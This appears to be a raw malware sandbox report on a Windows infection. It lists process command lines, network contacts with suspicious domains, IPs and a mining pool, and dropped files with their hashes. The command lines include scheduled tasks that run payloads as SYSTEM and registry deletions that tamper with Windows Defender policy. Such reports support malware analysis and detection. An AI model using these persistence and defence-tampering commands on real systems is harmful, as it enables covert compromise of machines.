schtasks /DELETE /F /TN "gBGfdOZyo"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "imJjYhUpaoZYZHtqO" /SC once /ST 01:37:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe\" HI /BKsite_idUjG 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "imJjYhUpaoZYZHtqO"

C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe

C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe HI /BKsite_idUjG 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bnTqljwkAIckBwCXiX"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\LYowOqXOU\SEZhTv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PrqbyCvyRaPTCyA" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "PrqbyCvyRaPTCyA2" /F /xml "C:\Program Files (x86)\LYowOqXOU\qwhXIaI.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "PrqbyCvyRaPTCyA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "PrqbyCvyRaPTCyA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "EJkQkmQiAqyKIE" /F /xml "C:\Program Files (x86)\FgzgbZZAFicU2\tzpDtvt.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "eaHFzrxPPpjLp2" /F /xml "C:\ProgramData\uOkirCjeoMUvNKVB\CWEiTPx.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "xjLLdQpZPaFaxvNZz2" /F /xml "C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\PIalxcO.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "dfmYRzBlaRqgkDuyWQh2" /F /xml "C:\Program Files (x86)\xWNndLwYWxPLC\JAwGJlf.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ovLFxavpEMJUeWygf" /SC once /ST 00:38:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\SafQccDpCMVtGOrp\yQsvKirx\lMbqfeR.dll\",#1 /Phsite_idzPm 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ovLFxavpEMJUeWygf"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SafQccDpCMVtGOrp\yQsvKirx\lMbqfeR.dll",#1 /Phsite_idzPm 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SafQccDpCMVtGOrp\yQsvKirx\lMbqfeR.dll",#1 /Phsite_idzPm 385118

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "imJjYhUpaoZYZHtqO"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ovLFxavpEMJUeWygf"

Network

Country Destination Domain Proto
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 172.67.169.89:443 yip.su tcp
US 8.8.8.8:53 galandskiyher5.com udp
US 8.8.8.8:53 voxel.dofuly.info udp
US 8.8.8.8:53 sty.ink udp
DE 185.172.128.126:80 185.172.128.126 tcp
US 8.8.8.8:53 net.geo.opera.com udp
NL 91.92.250.47:80 91.92.250.47 tcp
NL 91.92.250.47:80 91.92.250.47 tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
US 104.21.13.170:443 sty.ink tcp
US 104.21.62.68:80 voxel.dofuly.info tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
RU 81.94.159.197:80 galandskiyher5.com tcp
US 8.8.8.8:53 564675367.xyz udp
SK 45.95.11.69:443 564675367.xyz tcp
US 8.8.8.8:53 126.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 47.250.92.91.in-addr.arpa udp
US 8.8.8.8:53 68.62.21.104.in-addr.arpa udp
US 8.8.8.8:53 170.13.21.104.in-addr.arpa udp
US 8.8.8.8:53 111.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 197.159.94.81.in-addr.arpa udp
US 8.8.8.8:53 69.11.95.45.in-addr.arpa udp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
DE 185.172.128.187:80 185.172.128.187 tcp
DE 185.172.128.145:80 185.172.128.145 tcp
US 8.8.8.8:53 187.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 145.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
NL 185.26.182.124:443 autoupdate.geo.opera.com tcp
NL 185.26.182.124:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 124.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 features.opera-api2.com udp
US 8.8.8.8:53 download.opera.com udp
NL 82.145.216.23:443 download.opera.com tcp
US 8.8.8.8:53 23.216.145.82.in-addr.arpa udp
NL 185.26.182.111:443 features.opera-api2.com tcp
US 8.8.8.8:53 download3.operacdn.com udp
GB 95.101.143.176:443 download3.operacdn.com tcp
US 8.8.8.8:53 176.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 trad-einmyus.com udp
RU 81.94.159.197:80 galandskiyher5.com tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 sdfjhuz.com udp
DE 185.172.128.187:80 185.172.128.187 tcp
KR 220.82.134.210:80 sdfjhuz.com tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
RU 5.42.64.44:80 5.42.64.44 tcp
US 8.8.8.8:53 210.134.82.220.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
RU 5.42.64.44:80 5.42.64.44 tcp
US 8.8.8.8:53 44.64.42.5.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
RU 5.42.64.44:80 5.42.64.44 tcp
US 8.8.8.8:53 api.2ip.ua udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 220.139.67.172.in-addr.arpa udp
US 8.8.8.8:53 sportessentia.home.pl udp
PL 79.96.138.166:443 sportessentia.home.pl tcp
RU 5.42.64.44:80 5.42.64.44 tcp
US 8.8.8.8:53 166.138.96.79.in-addr.arpa udp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 m2reg.ulm.ac.id udp
ID 103.23.232.80:80 m2reg.ulm.ac.id tcp
US 8.8.8.8:53 80.232.23.103.in-addr.arpa udp
US 8.8.8.8:53 theonlyreasonwhywe.pro udp
US 172.67.218.191:443 theonlyreasonwhywe.pro tcp
US 8.8.8.8:53 wisemassiveharmonious.shop udp
US 8.8.8.8:53 colorfulequalugliess.shop udp
US 104.21.19.68:443 colorfulequalugliess.shop tcp
US 8.8.8.8:53 191.218.67.172.in-addr.arpa udp
US 8.8.8.8:53 68.19.21.104.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 193.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.200.46:443 clients2.google.com tcp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
LT 91.211.247.248:53 bxuuqnw.com udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 216.58.201.97:443 clients2.googleusercontent.com tcp
TR 195.16.74.230:80 bxuuqnw.com tcp
US 8.8.8.8:53 46.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 248.247.211.91.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 230.74.16.195.in-addr.arpa udp
GB 142.250.200.46:443 clients2.google.com tcp
US 8.8.8.8:53 api3.check-data.xyz udp
US 44.235.39.212:80 api3.check-data.xyz tcp
US 8.8.8.8:53 212.39.235.44.in-addr.arpa udp

Files

memory/456-0-0x0000023D41140000-0x0000023D411A6000-memory.dmp

memory/456-1-0x00007FFD659E0000-0x00007FFD664A1000-memory.dmp

memory/456-2-0x0000023D5B710000-0x0000023D5B720000-memory.dmp

memory/456-3-0x0000023D5C080000-0x0000023D5C0DC000-memory.dmp

memory/652-4-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2496-5-0x00007FFD659E0000-0x00007FFD664A1000-memory.dmp

memory/2496-11-0x000002B7EB3E0000-0x000002B7EB402000-memory.dmp

memory/2496-12-0x000002B7EAED0000-0x000002B7EAEE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dqmxqo3i.kko.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/652-17-0x0000000075360000-0x0000000075B10000-memory.dmp

memory/2496-18-0x000002B7EAED0000-0x000002B7EAEE0000-memory.dmp

memory/652-19-0x0000000002F20000-0x0000000002F30000-memory.dmp

memory/2496-22-0x00007FFD659E0000-0x00007FFD664A1000-memory.dmp

memory/456-23-0x00007FFD659E0000-0x00007FFD664A1000-memory.dmp

C:\Users\Admin\Pictures\PfWprLlupOSxC8b7ekM8atIx.exe

MD5 5b423612b36cde7f2745455c5dd82577
SHA1 0187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256 e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512 c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c

C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe

MD5 1a4bc801d6ed51e284e55b410b1e9ce3
SHA1 60732e475643a20fe44f8ad44e04a2ffb1b14a74
SHA256 b02db5ef9ee712655f43052f4350ce7449026cafa57bd238c16f58bb1b01d192
SHA512 262462bd590105d26faba7fc9a18110bbc2e414c4336a4beeaf32bfb06ad4c45ac2fec9e88c9d6ea5ef79b5926f513be1eb7e13dbed4e72fd498e6c5ec736720

C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe

MD5 2c9c87660455858852c317c34878c3c2
SHA1 d0a4372e3c0e130f2abfc4c0bc98cedcc27ba5e7
SHA256 adb8cfd47704d4fb436c600570e580a9a102460b640d0b863e5015e1f879a6df
SHA512 5b9e664832cedb44b63f9208c77b0a16ae219c52d8babf37afc14eff7dc9bdd1cc87eeb4f34db55d423a15207cfa84960ff6819985da677c3180e7743c3b589c

memory/3652-51-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp

MD5 33da9dc521f467c0405d3ef5377ce04b
SHA1 5249d7ce5dfabe5ee6d2fc7d3f3eba1e866b7d1f
SHA256 dbab8a7b2b45fc7001d5e34d3d45ccbe93a7591f12910281acf2c32f8c4e631c
SHA512 a3093637e1d731eab58080e10706db1afbf6e79fbac6593733b61033f97875ecbe230311e9741d349625ec3a66a6435318846d35290db8cd00af76d692699a55

C:\Users\Admin\AppData\Local\Temp\is-GVPS9.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/2536-67-0x00000000006A0000-0x00000000006A1000-memory.dmp

C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe

MD5 9fa95b17345d4e34558384c2ed84b444
SHA1 4a89a40c9cae3dfc8d59d89cf50728fb44611725
SHA256 13e62ced9672305c549138d2c5bc3142cce2731dbb2674ed9f4acfb9002f06fd
SHA512 018307efb7e63056ebb2df7a5edc15b7ce464e80179cdc85de83d955e57ca5cd83611641b8a49c82819b44301f91bd9f1631afb05f9f719f88ce7d34b787992c

C:\Users\Admin\AppData\Local\Temp\syncUpd.exe

MD5 2dca1d0c0e9f892a717ed02f6e90211a
SHA1 5857f867c5fb4bedc25794c1f960b3c03dfabccf
SHA256 b589fe21a9c02115d64fa8adab169804c69532eb2476132135a568afd179cefb
SHA512 2f84804935e96ba3ced308deaa1c5c8b991b4ab70551b192fbedee36b629b12780d338f84e2ed95e427eb4b93c6def9aa82d15f1d97add3fa8366b620463bd5d

C:\Users\Admin\AppData\Local\Lina Text\linatext.exe

MD5 0a2d5f96502140465c55815c136c107f
SHA1 521a872ae4fa52ec24b7f9e21bc580ef2796e491
SHA256 5580b0ded28cd875604a99bcb1309c0474493524c21492be829e3da0eea8447c
SHA512 f37a9bed2f431d0997b9d27d8e0c425c1b1ba27304fd1c01e15adda9ac93289c6293d8d7e3faadc8aef2ec874b470eb983a5f7964acaf0e3bfdfaea781725560

C:\Users\Admin\AppData\Local\Temp\nsk4604.tmp\INetC.dll

MD5 2b342079303895c50af8040a91f30f71
SHA1 b11335e1cb8356d9c337cb89fe81d669a69de17e
SHA256 2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f
SHA512 550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

memory/1720-120-0x0000000000400000-0x00000000005AA000-memory.dmp

memory/1720-118-0x0000000000400000-0x00000000005AA000-memory.dmp

C:\Users\Admin\AppData\Local\Lina Text\linatext.exe

MD5 7ae32340c855948c1e201cbc53b6182e
SHA1 482a29ea5d0dedea6adc295ae6cbb78905bd199c
SHA256 890b3b3d31090e102e0b917428f34550e55681ab845b7efef9e05d526eab0872
SHA512 030a222f02853b64b4be615f623f46884a0aac0b000b51494dd80bbbe3adb4c2287284dbe1a58aaa3b52f09c83095a2fd8b4676788ad68b90fba7e23d7075b4e

memory/3932-123-0x0000000000400000-0x00000000005AA000-memory.dmp

memory/3932-125-0x0000000000400000-0x00000000005AA000-memory.dmp

memory/384-127-0x0000000000800000-0x0000000000900000-memory.dmp

memory/384-128-0x0000000001F80000-0x0000000001F8B000-memory.dmp

memory/384-129-0x0000000000400000-0x000000000047E000-memory.dmp

memory/652-131-0x0000000075360000-0x0000000075B10000-memory.dmp

memory/3292-133-0x0000000002140000-0x0000000002167000-memory.dmp

memory/3292-132-0x00000000006D0000-0x00000000007D0000-memory.dmp

memory/3292-139-0x0000000000400000-0x000000000063B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 eee5ddcffbed16222cac0a1b4e2e466e
SHA1 28b40c88b8ea50b0782e2bcbb4cc0f411035f3d5
SHA256 2a40e5dccc7526c4982334941c90f95374460e2a816e84e724e98c4d52ae8c54
SHA512 8f88901f3ebd425818db09f268df19ccf8a755603f04e9481bcf02b112a84393f8a900ead77f8f971bfa33fd9fa5636b7494aaee864a0fb04e3273911a4216dc

memory/5104-146-0x0000000000400000-0x000000000043D000-memory.dmp

memory/764-147-0x0000000000400000-0x0000000000930000-memory.dmp

memory/652-148-0x0000000002F20000-0x0000000002F30000-memory.dmp

memory/764-149-0x0000000000C00000-0x0000000000C01000-memory.dmp

C:\Users\Admin\AppData\Roaming\Temp\Task.bat

MD5 11bb3db51f701d4e42d3287f71a6a43e
SHA1 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA256 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

memory/3292-153-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/3652-186-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe

MD5 825441372bbba175c241a1cf4c798438
SHA1 84c1e2f2a24b338666dc98b64b266335b7fae5e9
SHA256 c307873c80fd5892e04c45d29ccc3f0ad506f0e77d768f20426851434df2f933
SHA512 08c009748b1e4167d933e4e8443dac4600a0b5d1281fbbb660a28fb26682d9d6da46f39f1640ee3ffa3bc5b3dd3ee87b400a9b007b98cffedbd75e360ec2ac18

memory/3512-204-0x00000000006F0000-0x0000000000706000-memory.dmp

memory/384-205-0x0000000000400000-0x000000000047E000-memory.dmp

memory/2536-214-0x00000000006A0000-0x00000000006A1000-memory.dmp

memory/2536-222-0x0000000000400000-0x00000000004B8000-memory.dmp

memory/3292-223-0x0000000000400000-0x000000000063B000-memory.dmp

C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe

MD5 3d233051324a244029b80824692b2ad4
SHA1 a053ebdacbd5db447c35df6c4c1686920593ef96
SHA256 fbd467ce72bca00eea3aaa6f32abc8aca1a734030d082458e21e1fe91e6a8d84
SHA512 7f19c6400ac46556a9441844242b1acb0b2f11a47f5d51f6d092406a8c759a6d78c578bb5b15035e7cd1cdb3035acf0db884708b0da1a83eb652a50a68e3a949

memory/3932-234-0x0000000000400000-0x00000000005AA000-memory.dmp

C:\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/764-255-0x0000000000400000-0x0000000000930000-memory.dmp

C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe

MD5 edbbde4b537d39ba4c8d12c629fd692c
SHA1 676a6ef61724dac25961948f9af87d7c806f3835
SHA256 008902a088c8605dcded8298ed0c0d1f12dbb78b06bf44bf734005c77c890ed8
SHA512 550b5c429a292ba1086d0b11a1f317c09a7fc193b9b95d2e94fa620a837384e218b4788206c59b0234e2d1efe790880433fdefe182016c3885c981f4a86fca73

C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe

MD5 78efd4aeb880dd8802040dddc113f271
SHA1 41a0434db7d57fdc776a348b72a4108334652338
SHA256 bd9f4bb0d482665a4682b8f503c295b2f4804aaf3f91f529568b626cbd9d964b
SHA512 de1d5b3bdb0948a6c1a93cdb634134472fd666ece7e8ed1e40d2267c10ef3342a3cf6bf3a3582a547201abb9c1643dc8a241f865cfe2d2875b2469b404136438

C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe

MD5 e02512a7f6b8efe39828c778b014f035
SHA1 83519489be5305fda43e1d95cc55d8d802ccce6f
SHA256 a14af5e12b155500e8e6b35f9df454494aa8c2d5f461a16a503e90feb2169344
SHA512 3ad4ad341c262f90029717d9b55ccec23bf5c6c53efcbfd2acba0a8b492539bb26f0ed34e53097f87a890ebb37d3e71a214edf962dcefe7847990291240de51b

C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe

MD5 8fa0216e872fa81783c75b6f8d292f0f
SHA1 c6c5c36f4cfed327ff5f7db61d7961051ac0d590
SHA256 8136a9863428315ec06a5aecf0be74a9a6ffbfeeabc69eb088ee721ebb209903
SHA512 83fcc8dd3d7cbf553444df862ccde0f50d68075af2139f981c2a7cf74ea5ede8f44758200dc12fa3a3aeef3d45a29af9bc385a9c187bc1d0a79f5e75f5774075

C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe

MD5 3bb9d9646ee7d8da875007a53c1b11f1
SHA1 3188bb0e36f41408bb05c056f71c0fbfcf90917b
SHA256 91de96fb4afdd47b1b453496c2c52beca3bad15b76846acbf3938891e19ad296
SHA512 1307761a4e783f01cedb0ca98e8a8c16aaf36d46f460cd50186b987222965f672602008c729333a1a6bf44d802cc0752d6eecf8f9ba1c71c4cc0366aae90c89c

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403150201429814268.dll

MD5 accb0574d1b3d7fac9d5b5f85c7633b9
SHA1 82712162696100596de312280cc1a23682fb846b
SHA256 b37f77a459119a76bf5e51ca2e96dab212dc1c3ee8b600ca25f94d41e735ff0c
SHA512 97bb9c67427c1d95dc8a017b5b337d9012db6a67600c44477b68860025ca016eedcddae224b27be6e54e46d3d2a1ae5fe35c3bab8bf3d7be78d8e70d28ff1e2c

memory/3932-286-0x0000000000400000-0x00000000005AA000-memory.dmp

memory/4268-290-0x0000000000660000-0x0000000000B98000-memory.dmp

memory/1720-296-0x0000000000660000-0x0000000000B98000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403150201432001720.dll

MD5 910b9592b184a31510e59305cb657ea8
SHA1 596e0a8d094bce623db147fb878a7985c1e2d344
SHA256 5a2f87012815c9176be68dc94d73c5fcfb985b7589170c8c2685cb5559648db9
SHA512 bac09b3ea9af0bd7e14b9434b4b0916cecd9352417a1a56de55f03dffb2a22eed5b14d62b33683e2b34a31bf8430e76e74ed256b1c98f7ff8bdec0928ea19f8f

C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe

MD5 e6c68355c078515bc592a6628fe27df8
SHA1 0a36dda4e027d305a89b53ec518268867e964c28
SHA256 77d7fc4c80a48778aa22b34032284627258189a24f9b79c27e31450d792c0009
SHA512 a4ba81ae84db89be9c192cf00447cdd67d7a6cedca3ef27cc9eff849628c207e1b5f776b124d5e38a42706f9eb2a68e2ad9d4b4abfb21686a17b98cce869160d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzSZFMWFpthvMvdZfvnxrxs2.exe

MD5 eca4a3b65888bae4bbb922aaac532bfe
SHA1 02906ea04dfdca0c11ef4e54659ccad5f32ccbc8
SHA256 7c2daf7455713c45299a2ee7b95d10f710ad7b09f91f00ee693efda9e562e2b3
SHA512 71d274ddc8452d1322f70041910d8aeb6eb3d5adc6b75090682ffd56af42fd819632afd28029aac75fd76e4cc62991a3a00c5bb1a715a31b36c662d72f69936e

memory/3292-303-0x00000000006D0000-0x00000000007D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_240315020143653856.dll

MD5 8044657c7f04f53eaec26eabeb3a0ad4
SHA1 6c1a438b835a1d601caf6eb5832ed49a73891a9d
SHA256 d5220894bfd8e3a508cdbe85e8d7a11201b345d192dc6ade2e6955f4a9ee6a41
SHA512 5a8609a4a92712d1bf632e5b95e228e1f3ac49ff4b21e84d01986da609458bf32632d4a48bff75a4292a95b0dd3e73f1808fb1513433a4dd09cb1df0b8adf0bd

memory/3292-305-0x0000000000400000-0x000000000063B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_240315020143653856.dll

MD5 4311094279d49b549ddeb2dfa119aaec
SHA1 eae0f7c19b191232fe276af4cf5bded2fa58e9a7
SHA256 70ed755820a17f15cc0d386ebd9d2472aeb0029f85e8d19814e373cf242e42fd
SHA512 358a6471f122c82682e0729c18a75bb1449c261a7d3690ddf4dadc86373be77ed8fb80564ba93221068add1842e9494c1761d55a1cf233210e6a235e8c8e0d87

memory/856-312-0x0000000000F60000-0x0000000001498000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS86E3.tmp\Install.exe

MD5 a6e57e29fd138dff4760875c9cc63dec
SHA1 90952d0e1931f9584ea39d68b1c4db7f938fad5d
SHA256 606c38e956d0fa5157f33e3e0a27fdfdc7cfb72e4cce0dd453023b222b482fa7
SHA512 859872d6d3c32f734c72679730a11a5b08655f6b6d22338934149589e7ab50d9c2a78d65a9dbf35db58dea5b2117b4adb26d353aaae30101c4ed3a7900bd46cf

C:\Users\Admin\AppData\Local\Temp\7zS86E3.tmp\Install.exe

MD5 c3fef69fc391191a4b7b30e21b60b740
SHA1 d140dab662bb9d0e8287f51c1252de2a17be3960
SHA256 db729e8fdb08e00bdb81212e39eb2f27ec33e61d6a6d8bb98384be997fa5eb8d
SHA512 b4bbcdaad9e1ee188cb435893694ae3dd3f15c4e2f88c0b9253b3b2a4f8ddd9e07c200479216192b0681bf582f407b64f45ba86265362e712e089dc67e39aa69

C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe

MD5 451017013c8fe931141602ad982091ef
SHA1 6a8fa36852417a03328e715e9982a1ff33e78890
SHA256 d22699d9c8b27b57905773f82d4a873df2aaa7d26724d88ee43e6eb005076eea
SHA512 aed81f0a193e48dbc697a3b59444d111eefdc69dde70b2ec9ab4a5de821a0a4861c1d54df639b40bfb9da69b050a6ee3ed299c3329a83761764481fdc7bbcacf

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403150201440593128.dll

MD5 40d5188f242312c828b009ba77e9bcb8
SHA1 2cda395122f0510efc2abcc2aee6454efb6f3b92
SHA256 d81a531d1be9ed3623b9041186157dc20470692c6a0579728581d33a5e46b9cd
SHA512 f29654ffa139409161a67adfe0e9ac197a3e436f7ef3f3c29b7a8f0cde21482cb01c5681efcb3c72d8d051b46eba1283db802d20a8573536a3d9c113a5e466c4

memory/3128-321-0x0000000000660000-0x0000000000B98000-memory.dmp

memory/856-313-0x0000000000F60000-0x0000000001498000-memory.dmp

memory/764-323-0x0000000000C00000-0x0000000000C01000-memory.dmp

C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe

MD5 1a5ba32bf14b8d711b87fa4f501fa0e9
SHA1 1f11fa1fded1d7d5997b07c94e6e617bb28ce77d
SHA256 e18d907c483aacae1a031aa90d6a9b6c15e5ad4225b8cda661a233d26772fd17
